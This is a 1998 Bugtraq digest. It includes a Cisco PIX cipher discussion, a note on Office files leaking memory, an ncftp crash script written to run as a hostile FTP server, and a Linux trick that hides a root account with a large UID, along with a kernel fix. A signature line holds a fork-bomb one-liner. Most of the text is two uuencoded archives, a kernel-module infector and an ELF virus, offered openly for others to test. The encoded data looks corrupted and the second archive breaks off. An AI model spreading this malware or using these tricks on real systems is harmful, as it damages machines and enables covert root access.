Date: Tue, 23 Jun 1998 00:04:59 -0400
Reply-To: Bugtraq List
Sender: Bugtraq List
From: Automatic digest processor
Subject: BUGTRAQ Digest - 19 Jun 1998 to 22 Jun 1998
To: Recipients of BUGTRAQ digests
Message-Id: <19980623040705Z96081-31225+22@brimstone.netspace.org>
There are 9 messages totalling 699 lines in this issue.
Topics of the day:
1. CISCO PIX Vulnerability
2. Microsoft Insecurity... (2)
3. ncftp 2.4.3 bug (3)
4. Linux kernel: sys_set*id(uid_t...) confusion
5. (2)
----------------------------------------------------------------------
Date: Sat, 20 Jun 1998 10:24:54 -0300
From: Jamie Thain
Subject: Re: CISCO PIX Vulnerability
David,
David
> The simplest attack (``the Exabyte attack'') is to encrypt some
> common plaintext block (e.g. "\nlogin: ") under all 2^48 possible
> keys, and store the 2^48 ciphertext results on a big Exabyte tape;
> then each subsequent link-encryption key can be broken with O(1)
> effort. Thanks to the ECB mode, such a common plaintext block
> should be easy to find. (With a real chaining mode, these attacks
> are not possible under a ciphertext-only assumption, because the
> chaining vector serves as a kind of salt.)
Even if the ciper were a one byte char, the resulting data set size
would be 281,474 GB big, I have not heard of a 281TB tape drive yet.
> A much more practical approach would use Hellman's time-space
> tradeoff. There, you'd need only about 2^32 space (e.g. $100 at
> Fry's for a cheap hard disk), plus you'd need to do a 2^48 precomputation.
> After the precomputation, each subsequent link-encryption key
> can be broken with about 2^32 trial encryptions.
This is 4GB which is doable, but the resultant set of cipertexts would
still be ~24GB big, which makes you want to have a really good reason.
Although with some dedicated Hardware 281 Trillion combinations could be
tried in a few minutes, and it would be broken.
regards:jamie
------------------------------
Date: Mon, 22 Jun 1998 07:52:11 -0500
From: Mike
Subject: Microsoft Insecurity...
Well! After an overwhelming response from everyone, just a summery of the
conclusions:
1. This is a Microsoft Application problem, from Word, excel, etc from way
back as far as Word 2.0
2. This has been reported before to Microsoft, without any kind of
response or patch, etc
3. The problem is that the Microsoft Applications take RAM or Buffer
blocks to fill out application files - reading plaintext, etc,
indiscriminately.
4. Suggestions to turn off the 'Fast Save' option help, but do not by any
means eliminate the problem.
5. There is no other Fix - other than not attaching an application
document to send to anyone who could possibly use it maliciously.
6. I think I have heard the opinions from everyone EXCEPT any sort of
Microsoft rep, surprised?
7. It would be a simple fix of encrypting the 'fill' information with a
simple MD5 encryption or something similar, just to eliminate any plaintext.
Thanks to everyone for their suggestions and information....
Cheers
Mike
--------------------------------------------------
| Mike Morton DXStorm Geek Team Leader |
| |
| mike@dxstorm.com | DXShop ...Open For Business! |
--------------------------------------------------
| Quality Developers of Above Quality Solutions |
| http://www.dxshop.com |
--------------------------------------------------
------------------------------
Date: Sun, 21 Jun 1998 00:52:33 +0200
From: Paul Boehm
Subject: ncftp 2.4.3 bug
Hi,
i think i've found a bug in ncftp 2.4.3 (latest stable release)...
if you connect to a ftp server that responds with something like the
shit below ncftp2.4.3 segfaults. i think this is exploitable,
but had no time/motivation to look further into it.
probably this isn't very dangerous anyway cause
your victim needs to connect willingly, and using ncftp to your server..
that won't happen very often unless
you've been talking with your victim before.
anyway i thought it may be a good idea to post it, so here it is:
--snip-- ncftpcrashd.sh
#!/bin/bash
# ncftp2.4.3 crash by infected@cia.at
# Start this using inetd. (port 21)
echo "331 hi, barbie.. wanna crash with me?"
echo "230 sure ken!"
echo "then hop in"
--snip--
every reply that looks like this works:
331 a
230 b
c[putting here some exploit code may work]
bye,
paul
PS: i have no clue why this crashes ncftp... i haven't looked through
ncftp's source, but maybe someone else will.
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Name: Paul S. Boehm || Freelance Security Consulter.
Email: paul@is.destructive.org || PGPkey available at:
Url: http://paul.boehm.org/ || http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is is no reason for any individual to have a computer in their home.
--Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
------------------------------
Date: Fri, 19 Jun 1998 16:17:18 +0200
From: Michal Zalewski
Subject: Linux kernel: sys_set*id(uid_t...) confusion
Maybe this problem is well-known, but it seems to be not fixed yet:
'Physically', UID is stored by kernel in single word. Due to this
limitation, UID/GID must satisfy condition 0<=UID<=65535. But there are
serious problems with kernel sys_setuid(uid_t) and uid_t type itself:
- uid_t (UID/GID handling type), unsigned integer, is able to handle
large integers (>65535), eg. 131072.
- sys_setuid(uid_t) and other kernel UID/GID manipulation routines
(and their libc aliases, like setuid), silently strips higher uid_t bits,
then returns 'success' value (0).
So, attacker may change /etc/passwd UID of any account to 131072 (binary:
10 00000000 00000000) - it won't be traced by any intrusion-detection
programs looking for '0' UIDs, because uid_t is able to store this value,
and 131072 for sure is NOT equal to 0. But when he will login using this
account - he should get root shell (setuid, as I noticed above, silently
discards two highest bits, so 131072 becomes 0).
Nice trick, but that's not all. If you have eg. securetty installed to
prevent root logins from outside (or any other mechanism to prevent
unprivledged root access, eg. restricted 'su') - attacker will be able to
fool it, because UID retreived from /etc/passwd (uid_t) using standard
libc routines, is NOT equal to 0, so this account looks like
unprivledged...
Fixes:
First solution - rewrite kernel UID/GID code to extend UID address space
using eg. 4 bytes instead of 2 (whoow!) - but it will probably harm many
programs.
Second solution - patch your kernel to return EINVAL when uid_t is too
big. Here's the patch:
--- linux/kernel/sys.c.orig Tue Apr 8 17:47:47 1997
+++ linux/kernel/sys.c Fri Jun 19 16:00:28 1998
@@ -237,6 +237,8 @@
{
int old_rgid = current->gid;
int old_egid = current->egid;
+
+ if (rgid>0xffff || egid>0xffff) return -EINVAL;
if (rgid != (gid_t) -1) {
if ((old_rgid == rgid) ||
@@ -272,6 +274,8 @@
asmlinkage int sys_setgid(gid_t gid)
{
int old_egid = current->egid;
+
+ if (gid>0xffff) return -EINVAL;
if (suser())
current->gid = current->egid = current->sgid = current->fsgid = gid;
@@ -489,6 +493,8 @@
asmlinkage int sys_setuid(uid_t uid)
{
int old_euid = current->euid;
+
+ if (uid>0xffff) return -EINVAL;
if (suser())
current->uid = current->euid = current->suid = current->fsuid = uid;
@@ -510,6 +516,8 @@
asmlinkage int sys_setfsuid(uid_t uid)
{
int old_fsuid = current->fsuid;
+
+ if (uid>0xffff) return -EINVAL;
if (uid == current->uid || uid == current->euid ||
uid == current->suid || uid == current->fsuid || suser())
@@ -525,6 +533,8 @@
asmlinkage int sys_setfsgid(gid_t gid)
{
int old_fsgid = current->fsgid;
+
+ if (gid>0xffff) return -EINVAL;
if (gid == current->gid || gid == current->egid ||
gid == current->sgid || gid == current->fsgid || suser())
@@ -563,6 +573,8 @@
asmlinkage int sys_setpgid(pid_t pid, pid_t pgid)
{
struct task_struct * p;
+
+ if (pid>0xffff || pgid>0xffff) return -EINVAL;
if (!pid)
pid = current->pid;
_______________________________________________________________________
Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
------------------------------
Date: Sun, 21 Jun 1998 12:51:54 +0200
From: stealth@CYBERSPACE.ORG
Subject:
hi again,
now i send you an incredible module-infector that works
on linux 2.0.33 with kerneld running. Please let me know
if you successfully received this package.
uudecode was used again.
cya,
Stealthf0rk
begin 640 lkm-infector.zip
M4$L#!!0````(`&5LQR074`\84!(``#UZ>C4`````Y1MI5]M(\K/\*PJRF=C$%PZ;[,.!628A$S;$S,.0S"S+\Q-6
MVU;0X55+!,],_OM65;>DUD78MQ^7P+/51W7=5RN#';"LZ:>C"^C!="WFKNW!
M)S=R73@*'+B(PB]V('%N'0DI@GB_!3OX"[T#XQ_$*P&W0V?36^-Z<1MWX8Y!
MK%=A!$G@WH/A#6_M#2R3C>S"2D0"O@I8AOU^G^:.)+@0AYX#
MFS"!KVZ\@D^GO\`)M'%5'&UP#KY&;BS`#F!AR[CG!@LQC\.H0]L)WC/)&"(%
MB<<4@`V+Q/.Z$(1!+[P3$0%P@R7XH9-X`E((N,V.86['\Y60M,^[]1&8DP@Z
M=1X).Q8SM:?=P?,=O9//\Z'MV_=]>,5XN`N0H2_"0"`\ST,@PA/F[BMQ)P((
M`["3.)Q[P@ZNF?Y3-TCNP96(:PQ>&"Q%A.@S?WM2S!-DEV(N[+>9-,3BI^E;
M6(2>%W[%;>(^1H:*6]`,G;K!'$F,4YB!$(YP8`1+$4,4XDC[9L,,4[AUF/%R
M%28H@[6]X4/B&)7!#1EAS[4#P:`G(8J!=MK2AWGH$">1T\&C/E>A[4R:0E[UY=WKT,X%91*&OAC[:
MMV+A>H(7>6%XBVR(M/#C)`KN;`]EQ^MI<.%&,F9Y$)AP@0.!DXL$D4?6SHIX
M*[!?64]=E+1$/4'VM9^*FS6?YHM.*H?YRD9Y,:\#F,V0*[-9D0U;R.PD!A_U
MORR1CC:.=PA3.`EJH>*WM]D"&C]/`MI#`XHW:Q'YKI2T:,'DA5\#5!;]H)6$
M9&DCZEZX7"+:8;"UI<#1GV71TV]GEW`Y/8:+]R=30,>`S^=P]GD"YR?3#X`K
M-&(GSWQ&%^UJ'0;2)?D1`^Q@`X[MVTL6)]-&JJ6M9NW9&S(U.PH39!%C'J]<
MV0<--LR=`6U?V7>\CT0#(?**S`BY+M:2-].0OT$[]]:I<[)V^_`7F,^AA[]G
M(TA5".>L49^1\42PQ(.1-WHR9(&MR=2974\<5"0TUH]G;T^/)R0_$\H+.N#'
M'W^DTP"L/3X/7<7`3\\OI_FL^
MYB4=XP82`:7O3>_7!*[",RMB`+A@<*V#R?H:\+H5O9342PC(=!*H(T<#$(((T=$:-9L
M(M;KP_I_Z>:)B#\/(SS"PAAS>\_:Y=BH`4DT9X=L346$$>O6]3Q>M'1OP'?1
M!C&*.8+D)S[:KM>S'8?\EK7:H)%,/5NN190/SR63^94$A@BT%\<+U_V&C%`6ZX2**;\*VX
M29;LNU'-IN$B/D$G3(9H8Z@+R56$+HYHV[)H%;HE)`)"5,?H=ST^C87MQ:L%
M(C!@W%]+-?+W^09ID&M[CIH4+8F%@U8KU>+9[,/Q^>3X=#9K&8I]>7K<*NGY
MJ]WA7C9V/#F[_/D]O,H&?CK^^60R^_#Q^"/\D:#%+P/A<$P"C,^SA3Q`T\*/
M=F5*=^O&\6\1,9.W($6M@`_R@0U>*O'$3=#.X(YW4SRBZ;9YAP0S\FYS.T
MJIG&`D:[N[EJ'/WZR]'%>W@Q1/&D@V^/?[K\&>7PQ%W@B'ILH4RS^5_.3R87
M']IHLKZ-":$=+279/2:2;A#?MDD?9R>3=V>@5SQY0DLZK2?"D^(QD'!EX+@+
MUAD5CG68FZD$BXR+%`7S'Z08[D+7@9UT>A;;&*ZNKL>\/7-\:2@M>+4N4(C&
M&/5[FJY$&'HQ>*$UC_KW_7N=WU&TTA&?,$'T;R4%A[`'RUKN[_=A>V!*7^YW<7Q^AC1.!6(N'%.SJ7;.'F#>G7;.#MW
M,(5JG'77=WN-DYBBS*N3F@>UI*1SM;2DD_7$I+,-U*33#>2DT_7TI+/U!-41
M4DM`/>(-"#<@6H]@BMBP]6VZ],@_O[;OE$--O"5(0XH?5&FH09)??&@@9*\&"B@QC#1DA%@QRIZNWJU?75RR$\AY%V
M#W/,;F-EK`KSF0XV;*V7%]/9^?'I\='T>,S&C4R!]@Y%M4*%V&D3A)TNYF(Q
MQL-\5:$25*M@)U^Q%D$ZR'N+`.9>*'&3.90$2.JM/@Y'>=AP[L9B13`17SS6
MI:J'IH13G)BOVUJ#:!,B9#[I-5R-?W*C#.DBZ+S\&:6PU".M4$LI;<"Q66#[
M(B<#):%K54RW;@0LO?`&\SQBN7+N>.8;*CH/8')Y>JIV8.(;4T`+Q%=(@QMN
MET*0R_ZJ5L*,N_Q6200-;P#/R@TU+V@8"QOD%S"A)*'?=A;[@2][#?
MZ]!>6H'`VWX`!P8Q,8KU`J3[NTBQ9'8C-X9=^*(^$"S&(?J>GYU](93;V8J*_K;5(7Q`!UY#
M/5%J?PX=.<65&[/'7^
M%6`&4#H>16PPH$3H-Y4)I=TK;50(;H'>D?.B@J/I:BNB-)L2&-SHA,&SF+S=
M`IFBFGKL[EJ96R.DBXTKI7_X0(Q(%4_'FMS#H,VRSK%*YDK85>J9DZ2@26W!
M7:78F3U7--9D1:ZU1013U,;0*FJZ!JW]BPY<[339?0XJ!*!<#]3Y#VH9D_U?
M*;**M!D\](1S.R[K&^:`_7";<(?2#Y.`=;72QLQ9EO8;V!?/^YZUI#_?*B.:
M;83O>I/ZA$YU)R&X9<81ED(3&IEE4$=WE*IPT1BTDZLY*SM3GT7&]O`:#GE*
M+QY!,\8$S$BJPD$%UEJ20_G&+@\UP?`F%(=B"2((D^7*G&`?EEK(X8&NN(N:
MQKW@9)VU#/.C.+$J4U'U"N06/&K"Q/8M]1NX@6G'U=YF-^UW8_G$G;@D*G8K
MT3?X:V2":MO1$N[!HCI@0<:MMMXB]-VXMX@0J=XZ1',7$9='`;SASKMN0KN+
M=MM?XT:SXZHU)+>W=#GOD`0$2VL3#(=S`P2-^>&=!T^%?=\%ZLD:JP/5GK:I
MF./V+;5;\3>B=A'ZK/DM,.*ZQ\E+TZL#6X9!%\/"AAPE1[1G_OH9M#6[.908
MB'#S.#W^I\L+75NN1%#DH6I#5WD&X9K;O1H37FHK'!6*[74B5QX?,4Y)ENNN
M'I#)C0=_V1WM=7F866ET\1E_9#]RHK?'G>L.]!7%6.0B6S"_W<"-[<#*_8)'
M4K\68R;Z1V34G1U)[F+9`768,8RLW3GO/H$59JM\D!-R#X[O5ZMN>NPQ@]V6K3RF=9^J<17K=I]:+.=K]>WJI0&$I&][/C"!G
MCF61]5%O'LFR(64OQCZDGZ56,0/30,L_#(V()[FM;1(%@2-[+R2V!2"LI>:T
M@I1C&ZZ5QF8C]V&4Z[!]KX@@*-PK-$"C^ED5)#6*6C5Q=9_ZGJ-7S!^K3QE<
M@9MZNF>,M;8[9KS5+HTO%0*AU!%-I\[:^6B:0V]`??U4Y]I;'6X-$Q([])<+
MZ9X?M1+?*"6^-Y8H';WO\%"%F3QJ.PXJO%9W'BFQ4(%3C-;`D3_T.2`'V?NO
M?M)TJ+F6P90(K>Z/C(&I)I3S&TI#S8?:?(<[K)13B2Q;TG.6VI\F+UDPLG)0
MC8E-,9/>(DA__@E;62IG:GU:CNR.82DSD\F;V>7T>/;F[')R43W"3)M-EN^#(O^IY/P`'SHU22+U]SCP>3(T
MHM]Z%:%G>_+7D6XHI\M3&A#N]O:X,!R)13%=I4&V)AXMG*@=*850*CU]&W'O
M9C>2\W"]D5FYN55."4I=RG)W]IK+2DREF$[+JB2]E)_5@"BLN1Y#-:NL%'T-
MD`IKKJLIU/<)@#;5[#L=8Q01LJQ'@2H2D@.KE">9+E5)_3Y91;B%N2K%-2DB
MYX>I3>Z\JLDT2[VK]@]9)\Y,*+-OU`IJ$`A-71ME`K>%FH1'<]=5,U-]HX9-
M:K)F5[&HDN6"A(SRX1(*G4IN4)G;RMU*7F)87F@[,Y2#1_#S.67XEDJ'BUX@
M&]-NR>B]?,LH4)VM4IJ-I:SU*-VK6)_A_!ZC8Q6;>WA_R8R*D<+TE$6"T$-6
MV*+[9=7B89AV$]2SA%V2;EJHC/G^6-(K)>1'0^ERJJIO$)_C8I5]V.J^_@50
MHT1V]2V)>LUA^_CTW39]1S"^U"]C>)R2Y\TX=5S>?:AV)6D/2Q9TYX&''1%?
M[?%%RO";$>40PL(I.G"C>ZF`&5Z\$'7RD_7BK5>W"HORK48S2P\:*E?'++TPY)AK.^UTP`U0
M716@+DFY"R\,2.S7D%/&4(67C1@CM%R>^%!*C\@=^>LVG\FZVU$QN(Z'!H.:
M^KJ9@5$BP-J_"F7^UY]I;2OOR:B9F$OS[0%^#N+A<+A=M"(W4,T[LNZ'S6FWJSY'
M-7E9C>`9<+.5O-P;&F)1I_-JYA8M_'S^Y]GLXOQR\@8_WYP?'UU4MCVL$AF/
M]A4R3QU]CM9A-V"RRVWH@*V3\F=:_2A+9?;46ZD;7!?7C>K7X5G7142V%%3*
MXWG?=[%`%93T@A6I%;^P9Y:MZ[:6H8+U79O=S4U^6"*@=H;:U:F*\^%77)!C
M*G5MXE$64#Q7`E(Z$C0[XB)BY$WXN'8V9/@3I%(;6E>[NDX!46UG#_!II`%5
M/)(;5(:**J1R*]+B!CUMSEH<5RJ=K;'IEO5_;LT9<^J-^?_;E@M9BE6CJ0V<
M?"C[*=<2;<,>K29U8"D7I6ME8K4,D72PU#7(MK['=2OGXJ,D."HG.PBB:MLF
MWTRV6:9E6P63-L@IQW\;I.NOT<`X$8APMQL(W8<7]^OT77)EA-H@C;:Z?K>7
M"=?W>0C(%8YZTSOD:PP[.>)=O&6/S/^RMB(W0RD
M5\U%1]*%J.YR[R99--T]XU3U0FX7/=;P$25D?0VT1H6M9J&[CTI#TSO@B*\I
MC"B2Y:0U001IZ$**\V'9=V1J5@Q&HQ*J%1/I#(:94[[?)V=.BWC/S/`
MU1T!8C\>]$R)B,0K^B1%^IZZ!S:P@CE_^72!\F0U@D
M=#7RC.X!)%V14&=/O5BE+DA6J"(V5A:6WZ$;S[#&A.S-9,_A#O1T5D(2B^\^0+072M+M0,("F
MQD/^ZD[6KRXG8>S-ZX":^F#Z]`=3$H/%C3E)0Q0RZ?D?DH&&Z-0`E9LQMI.G
MRBB^,$N5:UL.CW59U;RW$-=R+N3)9IW,21>U`14N=.LSBH)&[9^LG>.+&,5W!WC+ZCZJ=9.GG(+D.LQ]VH5'9IG#74.BD9
M[XRT"V\"N_S&"`5B_-47*(/M/!!VLO=($#G5?UZ>C502P4&````
/``$``0!"````AA(`````
`
end
------------------------------
Date: Sun, 21 Jun 1998 12:52:56 +0200
From: stealth@CYBERSPACE.ORG
Subject:
hi all,
i send you a virus that infects ELF-files non-overwriting.
please send me an email and tell me if it works on your systems
(on my sys it still works of corse ...) if you received this package.
I guess that you use uudecode to get LinuxVirus.tgz ;) .
thanx,
Stealthf0rk
begin 640 LinuxVirus.tgz
M'XL(`+MT>C4``^P\^U,;1]+Y5?P5;>5B22#TX&'N>.6X@!WJ"+@`<\EA2K6L
M9L7:TJYJ9P7&_OC?O^Z>Q\X^!"0IY^KJLHF%=AX],]T]_9H>71R]/>Q^\W4?
M6.MM]'KP#=!3_*M?X-7ZZJNUC965U35\WWC57_T&UK_RO/B9R=1+`+Y)XCA]
MK-U3]?^ESP71/PC'8A!/9[U7:W/IW]_86'_%]%]?>;6RA@VAW]_H
MKW\#O:\RF\+S/T[_[B*$^#+B
M"C\>"A"IWX'%[L+"MV'DCV=8LBW381AW;G8!879N&**$B7=_+6`8!H%(1)1"
M&#DO)V<$(@=A'%XC"*=L%H58G"\+_"@=YXODO>PB)=-":9K@K/-EXS":?>H.
M0YH!U615]=M/G9LZ%@Q%@"N'\X.?WD*]FTZFW51,IG7%K[BZNS"]052$$D8B
M$HF7"D9,Y$T$Q`%_/_CY@-=F0"$D`\I"(E",P^[B\J./PG.`L&#_X!_OWBR(
M3ZE((GA]>(2C!,,M@C04U[/1B(A$XXH(T;RP@`B8^2D@)2?7LP"^+*B!\54,
M4O!\^K*5+YS$0U7ZL`4T-=@[WVOCQX_TL0^=3@>B.$6NF$5#(N?D'JG=D+P0
M/:\P4D.*IG^#FVNQ#?EY++8TZ#`*!!9O>]'G7410N8AZM6DK]BQ#6H0U:JU\&6AQHU@!WIM^$!_MA9JJ@U2O8T(PW]3
M+[TQ"P>P7[@93>1RI=>[PGYZXL1:_#&36Y!_NNM;#YA`,TF3E8UP2]-ZM!JP$'?\C9-7O(W=%YLE@_3W0G3>=1<2!
M`Y%H_YW<14!M:I*'5ONPM)0O8*0%"F4WL4R;3&W:(X1>%WFE65%W$GXH&D21
MOE`KTQ&YPI_>-XE1VA"T;)=R2YH4L8>7HBBZEKK+2\5*+:1`K_7X;"HA*AP-
M>)4*HN;^WPHP$1+Q7YCE[YED@3C\Z+U8+*YD"?57#)5B+#?-,>'
M1(W:PL-"3L(0JG8UHXWOH2!+%":5C*"O99FB%JQZM%$SMG/+2-IW6YJK""DR
M91%X.Q;1B/?YQ='!\9OS'[=,$P:.@C#8JCE"P4!@1J9:[,F36FQ-<"*QW]00
M'5Z>N^=Q[7X\O:_IE:!.X9.HU%!H;5S2+,.TL
M*!'IK-:?-A7:44_RVI;[V#T_V3XZ-?6H]-+4<\9!`#1(U"(/YU^G\G@_/3=\<_%`#5
MYBQR_IH(,JZ)7M2"F&`\W6RC:$96+)R?'RD6W.U#7&P;B-,L39^_QCN$06:A
MH-7^&BAF$XQC*7`"\["/A#%X*X.KX'9OBKV&BA51FAFVC),0V=<;*T%"VT!S
M.BSO`G7(J1S6?'H^6F,^CJQ=(`V:+7,^:I+J552@]Z$V#T6J`(':DB`1@F5%
MZSE\DZ**110D8A*CQ6(YQ=T#JJZ9+^(9HNA^0+.-D:V>*EL59;^TPKNRQ3*)
MB!J,X_@CZ1X/&D,T@_Q4&>L-)J272$"+BVBE:=0(B(`-U5?/J$_]9=Q&9Q*_
MH%6ZP`14@CV;A1;L#,#**FCGC+]5)(%@1*_\^5)>:-D^W4LA?BH&$JK$UB"?AO.#@[^.3@[.'\*FN+K
M_/X'!0\7W(95"P">F@^9/Y-ILWYP]+K.O;FGLQ%J94[-.%T#>@"!2\K&^E(P
MRUP098O-\F16]8#L"7.XD[A2C(-"88X/&[1%&F1JX+*>XC(]Q"6Y7/>;*'XA
MOOZ`+&&L%6\L8Z`!/?P.P6P\!O%)^+/4N\8&7S:7FW^%JX7,"J').?9'YL5$
M!4/#,:$4LTZBRW7%JY\V@G;OT]HZ??CT\:K=>-]K/+39(<=%%>QZDAJZ+[>;
M)T!H;AFC\PIS.F:>`,\TWW.9?;YZ6GN.1G%84XG<251D3,-6X$C5`KQ^E6W)
MK,I`:BX`QP"I%3D2&9P8DAYEB4I_++RHV=)\)15C-9180Y[A:F-]&5X#9-TZ
MU]1A@I\2;H0W3N_;U!!INNRP%?6+XF1BE%V3^I,7B5YIRV4V-1$M%3.AR`@,
M92)&L[&7L!-@\$L1Y5S:3'!FP*L9PG$3
M5$?:'\Z$GNB3D?)!XQZVJ3<:2@9#<23@>VB.P^@C;M%$M#,O5!+B"6%Y2LE8
MX5`CT:"IC,:*F(&9V;PMIH%M%MV--4/3LR
M'4SBH6@]U9=8OZH)(;=$Y?G&`8-"7F73JZ(>'Q:ZU$8%()F'[T+_!H(8O9\[
M58HN2!@RJW/59"93[GXLBNJ5W
M14G7Z6O#AS9)8ZCP_>"NPK%C;#S#&00==#+>V>4*Q9U,U2.L!`O5S&06O&D<
M@AWM(B2CV\O>E7YE'C/(T%C`VDHK9%9X0,RL+8-D&^I!-?SD:U6+VJDQ-?:
MVPOBA&22#L6W>`],XH2@DOT1F=CS!.D:D3MN+&A)<6D.3Z*;CV5*C["F(3/%
MP$@-#*\0?4'U<06S:(B\].[X\&>X0P>*(YXQ;CDOP840+#HFX"BX^)1:;H:F
M#9___,N_6]25)C>3HJ/VJ,*+QW!#K::/:@ZZ!;_K$LX@91S68T2M!5_+DX9D;;4LM,O^'>0X?''M=[O5Z%
M>*TIM.?X5/F]@=EA9EJ/^P*50"(+1*]F[BXM@"Q,RQ"\M']P]7HOZ/7E-T]A
MZT3!XSL'BAOG(>.UG)+VIYL@9[XOI&3GD%D`,?:=)/)_)UD]6[P92BK$%$,^
M:@=&^=?8O#H&'4_FZ=/&PF.X++?F+<3)_+YMI-\NWT<.KH5?3'_(YA%'!-7
M"2!\V,QN?Y<-O,V6B52@=E"!=C)W)!F+"Z6L#LX+>2(OHRK1HRHA),O<>"+[
MPZ9S/)8Y83,E&!':5O8D-.[(>`ME`XUB57$C<*&TZ+WS\X/C\\.38XK-Z"T7
M1^-[WI>ACZ5I9]*!^W@&RH2G3FCQ0I@J5,X20A5G7R!Z.WMI9C>394-Z0(_>
M;%$5]2=YCWWN0JPGE^!6)*224A%1&(9:G-'9FD0P:+:394
MFKD6`5G\;(HC-#L4$W2$]._H,+J2IZ9>O5$>@O&6R6DBJ6J27`Z/!W32KI(;
MEF'`!X"K[RH0#_/32X)73VO'7T==!5M+P]-IET#.SGPE%_&<)
ME[^4BVI#(2S[HFEP5VF]$(/GPX$.BG-6K185FYKE\D<%A;P-9P"J*0>,L^#B
MMQ1["*QX*3PZQ*LC$0FJI'B")/&\?O_N)#@_25K,YC&?7B!17WBS2`IJM
M;I.:#G[:^YEHUT''I"PY<4Z7_9+@C-H4D<2]/5!$V*$SPF>+48:NHOL[+L_\
M7N%9E&64FL6BK)\391P?I-%SC"@9)TB%:8BH<9J;B9:3BAA96F987!3#1N0$
M:HILE;OG'K63T&>Q`
MD>;%9WY.5TYNF,=EM(K>=2SA6GW%@!C1Z5IM20
M@1)4LH]0.W___?=Z@&JYF)-K2@`8L9;)E3G9B5JL8:&S`;00<\5%HQ0%=([BW#A#(9'8G0'-_1$K;4X*L*G'I9V0:=%0&BW\
M+!HFGJ_6QL9[9G(MPCLDI42/@W152Z7Y>$,^Y*!.EFN=+AGO9X*W("-54JW>
MX`8ZD_&EP4R;#'6BQG;Q9-9"<2V)BFTZ3[X[N9T5HKJL7!!G;T3J'(6H[6%L
M@MQNSRV=@R44Y=.^CF)LL\#+Y&IY=SB@]/['LHBK[:7LY%^?NQ!5E,5HT\XV
M22RX%HMK2*NJ%+U#7@P9+E1DCF@J[6:3[*U/^CE+@U14GPQE2@%_OCZL4#>_
M"5U/\D5Y(%?]&6OP,=W/F0)D=NG5_3YC5DNN37+(LDQ+)^NEC!_>+586MLK9
MX)`W>@O8XFL<6H)4N!$N\/Z<)'8-G";H0$,%Y:DEB%#%8)$SR-BM&(504LN5
M=$T>!-Q2AJ0A.B65(&NCC.Q69,@745ZL+)OYMB:O#FV2047P\L_G=S\<_YU0
MT.?K!8`?C__"ZMI*W]S_[*^OK5!(N-?;^#/^^T<\ZOZ?)!,260$.H0-[$8=R
M45VA`.18HKY$8=+-))_=PP_Q]#X)1SS!.;7G<2XX?<<&FA>C>!$FWCCTPW@F^6HAG;"A_36C6)&*?(XDA4ZQ
M\S26,J1,-\Y6H.C2Q+LG00V2[->A-_%&@@*V6)6`O)>IF+`5^PLVM=X^YWI,
MO*9LV:;Q701)*#_""_J/[=[&A`-DB9#3.%*CDL[VHGLSCCN^FBY,Q]X]!9*\
MQ)CC]JI@1YESE)9!B%;107682UD$)EO]+D+,ZQ>U`!I'09(WZAH'REP"$7.@
MEJHX)VH3_@*^#\LG*["\S\%N4/L:^'@'LDN^L!RK+IPXA=TH_#6U11!YOMR$
M#!R]5X'1HX\2(5(^MSP6Z;^0[A1%H51$;RS^;1K=Q'=$Q+LX^4BQ%?)GKCU<
MT%2*V3`>$.$WF:LXE80.&TA?T6!\0CZUKY!.IG3/BL>=POF/!X.+P],?3O8/
M;(;3;KXO6/]@?$)S!R?%@[_3-!8'*0"((ZJ;^
MU&H\!5Z(#7-&GN)K7QG<9Q=[Y\LC9(1I6YT>$X:HA\QV2+NF7_[NWU^+1$X]
M7W3B9*3SUXI'&4^YLH?1<_.1WBD%O714^.CDS;))M\B?
MEY0/2LBW(<92]R^3D>\FT]VZF713DQ"IBB1Z2W*E;-$('?1CSWMMTO"3I^EL48R7!WKTX/S@[[UZ'T6;N
MW1OFWFJHPI
MHL#G4/K$:?[5U/+BT?(F[MH$LW*O?!F4AG6CAK@D?2=XM51I\S_57!6/,G.6
M`C9TP>5_S[!I+?+3Q*%BJ5=Z3A@':%U2EVBKC@MY-?VLF
M=!WSD`Z&8QPD5SF^BJ(X"HD>TA,S
M-!FBM@K-FE>%2%=4TPBP#2M.M,?Z]SIOMOX^>A^9,J;4!?0Z??B'2#TL>?^^
M"[O;5'=!![:T:K)2@QE^#$4$1_L7<$@@ZO-.%>I[LR"9!9NPS=`O;:#K"B['
M\8A8YVJ7T8F+;MC:!DS09J1DSPC>T;'UK4@^"UP^$DZ*B(>L.$P0G\*TZ1XK
MN?<45&'-8@:QMY8_]M1(MSFW&9690/TKK3)7\`NU=74OXQ,40I49'8@D#4?%
MJ;H:!WYM^AL]V47'/!.R6:6P9]A*(]@)O,."N6Q7R^P[,[7L/HO'L>V,F^:&
MQHLM.`_C>A;DS3L??2*.V+4+D7<];^<2*-;743/5MQQ>=DPINZ+ZW1(=Q&=F
MBQBA^++FAHY>FZ5D*:V@[PU`L\]9GW/NTZ-_EJ"%W*S76VWF*I7Z:Q?%5P2R
MN#@T'=R7P^/ZOD"W2QCL*&X7T5,#KKCGG51GT+BRI3&Z33]YP%^7ENC7/`@=
MM&=0+@F5.X72;KP
M-O"&I=U8L:;5BDU;'!(YR!V2?(?5%U[+)R[@5`-N[*&*L,[.-*EA3&
MJ@]2RPM:JSS2+(S\$G=$U556DW)M$DGA)9P-#E_O'Y[RG.QWNGG`JKHD"JMP
M`3G)Y4S#;AX6!7KS?)PE,KQ%NSU,YX>%U2_%2+[2I+EWSLB*\$:Y)/-:Y)Y'
M3\,UJ&I\\!Q335]V,HB"V3E#Q"GD+Q2=_B]'!:VO.L;MY:MG5I[G'(:4^
M@9YL,,0-4)@PSB'\'*)RZ3QSZ@30ZB?;^S%4N8M6>N/1)=I1,J/GF?/*/9;6
M9'$>9A84O3]GMKE9_SJ$VQ7D$/];)U*^'?D[IIB?4K7=8P>>6Y._<5\UC,&^
M],BN.!>?(!C/Y$U37^6K2AA!<<%#\I-+M>BJ"V-.F=;@+);Y4D"%`5VX
